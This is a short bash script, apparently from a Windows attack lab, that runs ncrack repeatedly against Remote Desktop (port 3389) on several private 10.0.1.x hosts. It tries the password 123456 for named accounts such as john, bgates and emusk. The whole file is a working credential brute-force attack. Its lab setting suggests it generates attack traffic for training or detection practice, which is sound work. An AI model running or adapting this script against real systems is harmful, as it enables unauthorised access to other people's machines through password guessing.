#!/bin/bash

# RDP Bruteforce Attack

cd /winattacklab/

echo "=========================="
echo "RDP attack"
echo "=========================="
sleep 1

echo "launching RDP attack"
for (( i=0; i<10; ++i)); do
    echo "RDP-Bruteforcing with john:123456..."
    ncrack -v --user john --pass 123456 10.0.1.10:3389,to=5
done

for (( i=0; i<10; ++i)); do
    echo "RDP-Bruteforcing with ibuetler:123456..."
    ncrack -v --user ibuetler --pass 123456 10.0.1.100:3389,to=5
done

for (( i=0; i<10; ++i)); do
    echo "RDP-Bruteforcing with adiener:123456..."
    ncrack -v --user adiener --pass 123456 10.0.1.101:3389,to=5
done

for (( i=0; i<10; ++i)); do
    echo "RDP-Bruteforcing with bgates:123456..."
    ncrack -v --user bgates --pass 123456 10.0.1.102:3389,to=5
done

for (( i=0; i<10; ++i)); do
    echo "RDP-Bruteforcing with emusk:123456..."
    ncrack -v --user emusk --pass 123456 10.0.1.103:3389,to=5
done
